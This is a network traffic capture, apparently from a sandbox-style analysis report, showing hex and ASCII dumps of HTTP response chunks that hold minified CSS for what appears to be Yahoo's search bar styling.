                                                                                                                                                                        2023-06-02 11:13:21 UTC284INData Raw: 64 6e 69 67 68 74 29 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 20 2e 5f 79 62 5f 31 6b 78 32 64 3a 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 7b 63 6f 6c 6f 72 3a 23 31 30 31 35 31 38 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 6d 69 64 6e 69 67 68 74 29 7d 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 20 2e 5f 79 62 5f 31 6b 78 32 64 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 7b 63 6f 6c 6f 72 3a 23 31 30 31 35 31 38 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 6d 69 64 6e 69 67 68 74 29 7d 7d 2e 5f 79 62 5f 6f 35 61 63 38 20 2e 5f 79 62 5f 31 6b
                                                                                                                                                                        Data Ascii: dnight)}@media (prefers-color-scheme:dark){html[data-color-theme-enabled] ._yb_1kx2d::-moz-placeholder{color:#101518;color:var(--yb-midnight)}html[data-color-theme-enabled] ._yb_1kx2d::placeholder{color:#101518;color:var(--yb-midnight)}}._yb_o5ac8 ._yb_1k
                                                                                                                                                                        2023-06-02 11:13:21 UTC285INData Raw: 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 20 2e 5f 79 62 5f 31 70 61 78 69 20 73 70 61 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 63 76 2f 61 70 69 76 32 2f 79 62 61 72 2f 69 63 6f 6e 73 2f 63 6c 6f 73 65 2d 32 34 38 33 32 32 35 32 2e 73 76 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 63 65 6e 74 65 72 7d 7d 2e 79 62 61 72 2d 65 6e 61 62 6c 65 2d 73 65 61 72 63 68 2d 75 69 20 2e 5f 79 62 5f 61 70 31 31 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 5f 79 62 5f 61 70 31 31 64 7b 64 69 73 70 6c
                                                                                                                                                                        Data Ascii: }@media (prefers-color-scheme:dark){html[data-color-theme-enabled] ._yb_1paxi span{background-image:url(https://s.yimg.com/cv/apiv2/ybar/icons/close-24832252.svg);background-position:center}}.ybar-enable-search-ui ._yb_ap11d{display:block}._yb_ap11d{displ
                                                                                                                                                                        2023-06-02 11:13:21 UTC286INData Raw: 3a 76 61 6c 69 64 7e 2e 5f 79 62 5f 61 70 31 31 64 20 62 75 74 74 6f 6e 2e 5f 79 62 5f 31 70 6d 74 65 2c 2e 79 62 61 72 2d 76 6f 69 63 65 2d 73 65 61 72 63 68 20 2e 5f 79 62 5f 31 6b 78 32 64 3a 76 61 6c 69 64 7e 2e 5f 79 62 5f 61 70 31 31 64 20 62 75 74 74 6f 6e 2e 5f 79 62 5f 31 70 6d 74 65 7b 74 6f 70 3a 35 70 78 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 31 6b 78 32 64 3a 76 61 6c 69 64 7e 2e 5f 79 62 5f 61 70 31 31 64 20 62 75 74 74 6f 6e 2e 5f 79 62 5f 31 70 6d 74 65 7b 74 6f 70 3a 30 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 79 62 61 72 2d 65 6e 61 62 6c 65 2d 73 65 61 72 63 68 2d 75 69 20 2e 5f 79 62 5f 31 70 61 78 69 2c 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 74 79
                                                                                                                                                                        Data Ascii: :valid~._yb_ap11d button._yb_1pmte,.ybar-voice-search ._yb_1kx2d:valid~._yb_ap11d button._yb_1pmte{top:5px}.ybar-ytheme-crunch ._yb_1kx2d:valid~._yb_ap11d button._yb_1pmte{top:0}.ybar-ytheme-crunch .ybar-enable-search-ui ._yb_1paxi,.ybar-ytheme-crunch .ty
                                                                                                                                                                        2023-06-02 11:13:21 UTC288INData Raw: 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 37 79 6d 31 38 20 73 76 67 20 70 61 74 68 7b 66 69 6c 6c 3a 23 32 33 32 61 33 31 3b 66 69 6c 6c 3a 76 61 72 28 2d 2d 79 62 2d 62 61 74 63 61 76 65 29 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 61 6c 61 62 62 3a 68 6f 76 65 72 20 2e 5f 79 62 5f 6a 7a 76 72 67 2c 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 37 79 6d 31 38 3a 68 6f 76 65 72 20 2e 5f 79 62 5f 72 6b 6d 79 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 30 66 33 66 35 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 79 62 2d 67 72 61 79 2d 68 61 69 72 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 30 70 78 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d
                                                                                                                                                                        Data Ascii: .ybar-ytheme-crunch ._yb_7ym18 svg path{fill:#232a31;fill:var(--yb-batcave)}.ybar-ytheme-crunch ._yb_alabb:hover ._yb_jzvrg,.ybar-ytheme-crunch ._yb_7ym18:hover ._yb_rkmym{background:#f0f3f5;background:var(--yb-gray-hair);border-radius:100px}.ybar-ytheme-
                                                                                                                                                                        2023-06-02 11:13:21 UTC289INData Raw: 7b 72 69 67 68 74 3a 37 36 70 78 3b 74 6f 70 3a 38 70 78 7d 2e 79 62 61 72 2d 76 6f 69 63 65 2d 73 65 61 72 63 68 20 2e 5f 79 62 5f 61 70 31 31 64 2c 2e 79 62 61 72 2d 65 6e 61 62 6c 65 2d 73 65 61 72 63 68 2d 75 69 20 2e 5f 79 62 5f 61 70 31 31 64 2c 2e 79 62 61 72 2d 65 6e 61 62 6c 65 2d 73 65 61 72 63 68 2d 75 69 2e 79 62 61 72 2d 76 6f 69 63 65 2d 73 65 61 72 63 68 20 2e 5f 79 62 5f 61 70 31 31 64 7b 72 69 67 68 74 3a 37 36 70 78 3b 74 6f 70 3a 35 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 33 34 30 70 78 29 7b 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 20 2e 5f 79 62 5f 61 70 31 31 64 7b 72 69 67 68 74 3a 39 36 70 78 3b 74 6f 70 3a 38 70 78 7d 2e 79 62 61 72 2d 76 6f 69 63 65 2d 73
                                                                                                                                                                        Data Ascii: {right:76px;top:8px}.ybar-voice-search ._yb_ap11d,.ybar-enable-search-ui ._yb_ap11d,.ybar-enable-search-ui.ybar-voice-search ._yb_ap11d{right:76px;top:5px}}@media screen and (min-width:1340px){.ybar-ytheme-fuji2 ._yb_ap11d{right:96px;top:8px}.ybar-voice-s
                                                                                                                                                                        2023-06-02 11:13:21 UTC290INData Raw: 79 70 69 6e 67 20 2e 79 62 61 72 2d 65 6e 61 62 6c 65 2d 73 65 61 72 63 68 2d 75 69 20 2e 5f 79 62 5f 31 6b 78 32 64 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 34 70 78 20 31 36 70 78 20 30 20 72 67 62 28 30 20 30 20 30 2f 32 30 25 29 2c 30 20 30 20 32 70 78 20 30 20 72 67 62 28 30 20 30 20 30 2f 35 25 29 3b 62 6f 72 64 65 72 3a 30 3b 70 61 64 64 69 6e 67 3a 31 70 78 20 35 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 77 68 69 74 65 29 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 74 79 70 69 6e 67 20 2e 79 62 61 72 2d 65 6e 61 62 6c 65 2d 73 65 61 72 63 68 2d 75 69 2e 5f 79 62 5f 6c 76 62 69 63 2e 5f 79 62 5f 31 36 33 66 34 20
                                                                                                                                                                        Data Ascii: yping .ybar-enable-search-ui ._yb_1kx2d{box-shadow:0 4px 16px 0 rgb(0 0 0/20%),0 0 2px 0 rgb(0 0 0/5%);border:0;padding:1px 50px;background-color:#fff;background-color:var(--yb-white)}.ybar-ytheme-crunch .typing .ybar-enable-search-ui._yb_lvbic._yb_163f4
                                                                                                                                                                        2023-06-02 11:13:21 UTC291INData Raw: 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 63 34 31 32 33 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 63 6f 6c 6f 72 2d 66 72 6f 6e 74 69 65 72 2d 72 65 64 29 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 20 2e 5f 79 62 5f 31 76 70 67 75 2e 5f 79 62 5f 65 68 70 66 65 20 2e 5f 79 62 5f 6d 6b 39 32 37 2c 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 20 2e 5f 79 62 5f 33 6b 77 68 6d 2e 5f 79 62 5f 65 68 70 66 65 20 2e 5f 79 62 5f 6d 6b 39 32 37 7b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 5f 79 62 5f 64 36 31 32 77 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 63 34 31 35 32 32 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 63 6f 6c 6f 72 2d 72 6f 67
                                                                                                                                                                        Data Ascii: kground-color:#c41230;background-color:var(--yb-color-frontier-red)}.ybar-ytheme-fuji2 ._yb_1vpgu._yb_ehpfe ._yb_mk927,.ybar-ytheme-fuji2 ._yb_3kwhm._yb_ehpfe ._yb_mk927{animation-name:_yb_d612w;background-color:#c41522;background-color:var(--yb-color-rog
                                                                                                                                                                        2023-06-02 11:13:21 UTC293INData Raw: 78 3b 6c 65 66 74 3a 2d 34 70 78 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 20 2e 79 62 61 72 2d 76 6f 69 63 65 2d 73 65 61 72 63 68 20 2e 5f 79 62 5f 6d 6b 39 32 37 2c 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 20 2e 79 62 61 72 2d 65 6e 61 62 6c 65 2d 73 65 61 72 63 68 2d 75 69 20 2e 5f 79 62 5f 6d 6b 39 32 37 7b 6d 69 6e 2d 77 69 64 74 68 3a 38 30 70 78 3b 77 69 64 74 68 3a 38 30 70 78 3b 74 6f 70 3a 2d 35 70 78 3b 6c 65 66 74 3a 2d 34 70 78 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 6c 61 73 73 69 63 20 2e 5f 79 62 5f 6d 6b 39 32 37 7b 68 65 69 67 68 74 3a 34 36 70 78 3b 6c 65 66 74 3a 36 70 78 3b 74 6f 70 3a 2d 38 70 78 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 6c 61 73 73 69 63 20 2e 79 62 61 72 2d 65 6e 61 62 6c 65 2d
                                                                                                                                                                        Data Ascii: x;left:-4px}.ybar-ytheme-fuji2 .ybar-voice-search ._yb_mk927,.ybar-ytheme-fuji2 .ybar-enable-search-ui ._yb_mk927{min-width:80px;width:80px;top:-5px;left:-4px}.ybar-ytheme-classic ._yb_mk927{height:46px;left:6px;top:-8px}.ybar-ytheme-classic .ybar-enable-
                                                                                                                                                                        2023-06-02 11:13:21 UTC293INData Raw: 78 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 6c 61 73 73 69 63 20 2e 79 62 61 72 2d 65 6e 61 62 6c 65 2d 73 65 61 72 63 68 2d 75 69 20 2e 5f 79 62 5f 6d 6b 39 32 37 7b 74 6f 70 3a 2d 34 70 78 3b 6c 65 66 74 3a 34 70 78 7d 2e 74 79 70 69 6e 67 20 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 6c 61 73 73 69 63 20 2e 79 62 61 72 2d 65 6e 61 62 6c 65 2d 73 65 61 72 63 68 2d 75 69 20 2e 5f 79 62 5f 6d 6b 39 32 37 7b 74 6f 70 3a 2d 35 70 78 3b 6c 65 66 74 3a 31 30 70 78 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 5f 79 62 5f 31 38 67 76 63 7b 30 25 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 37 30 31 65 64 7d 33 33 25 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 66 36 39 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61
                                                                                                                                                                        Data Ascii: x}.ybar-ytheme-classic .ybar-enable-search-ui ._yb_mk927{top:-4px;left:4px}.typing .ybar-ytheme-classic .ybar-enable-search-ui ._yb_mk927{top:-5px;left:10px}}@keyframes _yb_18gvc{0%{background-color:#5701ed}33%{background-color:#0f69ff;background-color:va
                                                                                                                                                                        2023-06-02 11:13:21 UTC295INData Raw: 73 76 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 79 62 61 72 2d 65 6e 61 62 6c 65 2d 73 65 61 72 63 68 2d 75 69 2e 5f 79 62 5f 31 36 33 66 34 20 2e 5f 79 62 5f 31 63 67 73 66 20 73 76 67 2c 2e 74 79 70 69 6e 67 20 2e 79 62 61 72 2d 65 6e 61 62 6c 65 2d 73 65 61 72 63 68 2d 75 69 20 2e 5f 79 62 5f 31 63 67 73 66 20 73 76 67 7b 77 69 64 74 68 3a 31 36 70 78 3b 68 65 69 67 68 74 3a 31 36 70 78 3b 66 69 6c 6c 3a 23 32 33 32 61 33 31 3b 66 69 6c 6c 3a 76 61 72 28 2d 2d 79 62 2d 62 61 74 63 61 76 65 29 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 31 36 70 78 3b 74 6f 70 3a 33 30 25 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 79 62 61 72 2d 65 6e 61 62 6c 65 2d 73 65 61 72 63 68 2d 75 69 2e 5f 79 62 5f 31
                                                                                                                                                                        Data Ascii: svg{display:none}.ybar-enable-search-ui._yb_163f4 ._yb_1cgsf svg,.typing .ybar-enable-search-ui ._yb_1cgsf svg{width:16px;height:16px;fill:#232a31;fill:var(--yb-batcave);position:absolute;left:16px;top:30%;display:inline-block}.ybar-enable-search-ui._yb_1
                                                                                                                                                                        2023-06-02 11:13:21 UTC296INData Raw: 20 6c 69 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 2c 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 20 2e 73 61 2e 5f 79 62 5f 6a 6a 65 68 62 2e 5f 79 62 5f 31 77 73 77 35 20 6c 69 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 2c 2e 74 79 70 69 6e 67 20 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 2e 5f 79 62 5f 6a 6a 65 68 62 2e 5f 79 62 5f 31 70 66 67 61 20 6c 69 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 2c 2e 74 79 70 69 6e 67 20 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 2e 5f 79 62 5f 6a 6a 65 68 62 2e 5f 79 62 5f 31 77 73 77 35 20 6c 69 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 7d 2e 5f 79 62 5f 31 30 78 31 75 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a
                                                                                                                                                                        Data Ascii: li:last-of-type,.ybar-ytheme-fuji2 .sa._yb_jjehb._yb_1wsw5 li:last-of-type,.typing .ybar-ytheme-fuji2._yb_jjehb._yb_1pfga li:last-of-type,.typing .ybar-ytheme-fuji2._yb_jjehb._yb_1wsw5 li:last-of-type{padding-bottom:16px}._yb_10x1u{margin:0;padding-left:
                                                                                                                                                                        2023-06-02 11:13:21 UTC297INData Raw: 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 64 61 72 6b 5d 20 2e 73 61 20 2e 5f 79 62 5f 31 6b 78 32 64 3a 66 6f 63 75 73 2c 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 64 61 72 6b 5d 20 2e 74 79 70 69 6e 67 20 2e 5f 79 62 5f 31 6b 78 32 64 3a 66 6f 63 75 73 2c 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 64 61 72 6b 5d 20 2e 73 61 20 2e 5f 79 62 5f 31 6b 78 32 64 2c 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63
                                                                                                                                                                        Data Ascii: -theme-enabled][data-color-scheme=dark] .sa ._yb_1kx2d:focus,html[data-color-theme-enabled][data-color-scheme=dark] .typing ._yb_1kx2d:focus,html[data-color-theme-enabled][data-color-scheme=dark] .sa ._yb_1kx2d,html[data-color-theme-enabled][data-color-sc
                                                                                                                                                                        2023-06-02 11:13:21 UTC298INData Raw: 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 25 32 33 32 33 32 41 33 31 22 20 64 3d 22 4d 31 30 2e 38 30 32 34 36 34 2c 31 31 2e 35 39 36 36 36 32 36 20 4c 31 35 2e 37 30 39 30 30 34 39 2c 36 2e 36 39 30 31 32 31 36 38 20 43 31 36 2e 30 38 36 34 33 31 31 2c 36 2e 33 31 31 37 30 34 38 34 20 31 36 2e 30 39 32 33 37 34 38 2c 35 2e 36 37 38 36 39 38 36 35 20 31 35 2e 37 30 36 30 33 33 2c 35 2e 32 39 32 33 35 36 38 35 20 43 31 35 2e 33 31 35 37 32 38 38 2c 34 2e 39 30 32 30 35 32 35 37 20 31 34 2e 36 39 32 36 32 38 38 2c 34 2e 39 30 34 30 33 33 38 31 20 31 34 2e 33 30 38 32 36 38 32 2c 35 2e 32 38 39 33 38 34 39 39 20 4c 38 2c 31 31 2e 35 39 36 36 36 32 36 20 4c 31 34 2e 33 31 30 32 34 39 34 2c 31 37 2e 39 30
                                                                                                                                                                        Data Ascii: viewBox="0 0 24 24"><path fill="%23232A31" d="M10.802464,11.5966626 L15.7090049,6.69012168 C16.0864311,6.31170484 16.0923748,5.67869865 15.706033,5.29235685 C15.3157288,4.90205257 14.6926288,4.90403381 14.3082682,5.28938499 L8,11.5966626 L14.3102494,17.90
                                                                                                                                                                        2023-06-02 11:13:21 UTC300INData Raw: 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 33 35 70 78 7d 2e 5f 79 62 5f 31 70 63 33 6e 20 73 70 61 6e 7b 70 61 64 64 69 6e 67 3a 38 70 78 20 30 20 38 70 78 20 38 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 5f 79 62 5f 31 69 6e 76 30 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 30 20 30 3b 62 6f 72 64 65 72 3a 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 5f 79 62 5f 31 69 6e 76 30 20 73 70 61 6e 7b 74 65 78 74 2d 69 6e 64 65 6e 74 3a 2d 39 39 39 39 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 5f 79 62 5f 71 73 6e 70 36 20 2e 5f 79 62 5f 63 6c 65 34 33 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 5f 79 62 5f 65 7a 6c 74 35 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 76 69 73
                                                                                                                                                                        Data Ascii: px;display:flex;height:35px}._yb_1pc3n span{padding:8px 0 8px 8px;font-size:14px}._yb_1inv0{background:0 0;border:0;cursor:pointer}._yb_1inv0 span{text-indent:-9999px;display:inline-block}._yb_qsnp6 ._yb_cle43{display:none}._yb_ezlt5{position:absolute;vis
                                                                                                                                                                        2023-06-02 11:13:21 UTC301INData Raw: 5f 64 35 77 36 37 20 2e 5f 79 62 5f 6d 6b 39 32 37 7b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 5f 79 62 5f 64 36 31 32 77 7d 2e 5f 79 62 5f 31 37 63 75 68 2e 5f 79 62 5f 31 68 7a 66 36 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 30 31 35 31 38 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 6d 69 64 6e 69 67 68 74 29 3b 6f 70 61 63 69 74 79 3a 2e 37 7d 2e 5f 79 62 5f 31 37 63 75 68 2e 5f 79 62 5f 31 65 38 6b 67 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 30 31 35 31 38 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 6d 69 64 6e 69 67 68 74 29 3b 6f 70 61 63 69 74 79 3a 2e 36 7d 2e 5f 79 62 5f 31 30 76 6b 70 20 2e 5f 79 62 5f 6d 6b 39 32 37 7b 61 6e 69 6d
                                                                                                                                                                        Data Ascii: _d5w67 ._yb_mk927{animation-name:_yb_d612w}._yb_17cuh._yb_1hzf6{background-color:#101518;background-color:var(--yb-midnight);opacity:.7}._yb_17cuh._yb_1e8kg{background-color:#101518;background-color:var(--yb-midnight);opacity:.6}._yb_10vkp ._yb_mk927{anim
                                                                                                                                                                        2023-06-02 11:13:21 UTC302INData Raw: 64 74 68 3a 31 30 30 25 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 34 70 78 20 31 32 70 78 20 72 67 62 28 30 20 30 20 30 2f 31 36 25 29 3b 2d 77 65 62 6b 69 74 2d 63 6c 69 70 2d 70 61 74 68 3a 69 6e 73 65 74 28 30 20 2d 31 32 70 78 20 2d 31 32 70 78 20 2d 31 32 70 78 29 3b 63 6c 69 70 2d 70 61 74 68 3a 69 6e 73 65 74 28 30 20 2d 31 32 70 78 20 2d 31 32 70 78 20 2d 31 32 70 78 29 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 30 70 78 29 7b 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 20 2e 5f 79 62 5f 31 70 36 34 38 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 33 70 78 7d 7d 2e 5f 79 62 5f 6d 64 6b 78 70 20 2e 5f 79 62 5f 72 7a 6e 6a 39 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 5f 79
                                                                                                                                                                        Data Ascii: dth:100%;box-shadow:0 4px 12px rgb(0 0 0/16%);-webkit-clip-path:inset(0 -12px -12px -12px);clip-path:inset(0 -12px -12px -12px)}@media screen and (min-width:1020px){.ybar-ytheme-fuji2 ._yb_1p648{margin-top:43px}}._yb_mdkxp ._yb_rznj9{position:absolute}._y
                                                                                                                                                                        2023-06-02 11:13:21 UTC304INData Raw: 3b 63 6f 6c 6f 72 3a 23 31 64 32 32 32 38 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 69 6e 6b 77 65 6c 6c 29 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 32 32 70 78 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 38 70 78 3b 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 79 62 2d 77 68 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 63 75 72 73 6f 72 3a
                                                                                                                                                                        Data Ascii: ;color:#1d2228;color:var(--yb-inkwell);padding:4px 22px;word-wrap:break-word;line-height:18px;height:inherit;margin:0;list-style:none;background:#fff;background:var(--yb-white);-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:antialiased;cursor:
                                                                                                                                                                        2023-06-02 11:13:21 UTC305INData Raw: 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 5f 79 62 5f 6d 64 6b 78 70 2e 5f 79 62 5f 31 6d 79 37 36 20 2e 5f 79 62 5f 31 61 78 6b 75 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 5f 79 62 5f 6d 64 6b 78 70 2e 5f 79 62 5f 31 6d 79 37 36 20 2e 5f 79 62 5f 31 35 33 31 35 20 6c 69 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 5f 79 62 5f 31 35 33 31 35 20 2e 5f 79 62 5f 72 75 6a 69 39 2c 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 2e 79 62 61 72 2d 70 72 6f 70 65 72 74 79 2d 68 6f 6d 65 70 61 67 65 20 2e 5f 79 62 5f 31 35 33 31 35 20 2e 5f 79 62 5f 72 75 6a 69 39 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 31 66 31 66 31 21 69 6d 70 6f
                                                                                                                                                                        Data Ascii: {font-weight:700!important}._yb_mdkxp._yb_1my76 ._yb_1axku{font-weight:400!important}._yb_mdkxp._yb_1my76 ._yb_15315 li{font-weight:700!important}._yb_15315 ._yb_ruji9,.ybar-ytheme-fuji2.ybar-property-homepage ._yb_15315 ._yb_ruji9{background:#f1f1f1!impo
                                                                                                                                                                        2023-06-02 11:13:21 UTC306INData Raw: 5f 79 62 5f 31 35 33 31 35 20 6c 69 20 62 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 31 30 31 35 31 38 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 6d 69 64 6e 69 67 68 74 29 7d 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 64 61 72 6b 5d 20 2e 5f 79 62 5f 31 35 33 31 35 20 6c 69 2c 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 64 61 72 6b 5d 20 2e 5f 79 62 5f 31 35 33 31 35 20 6c 69 20 62 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d
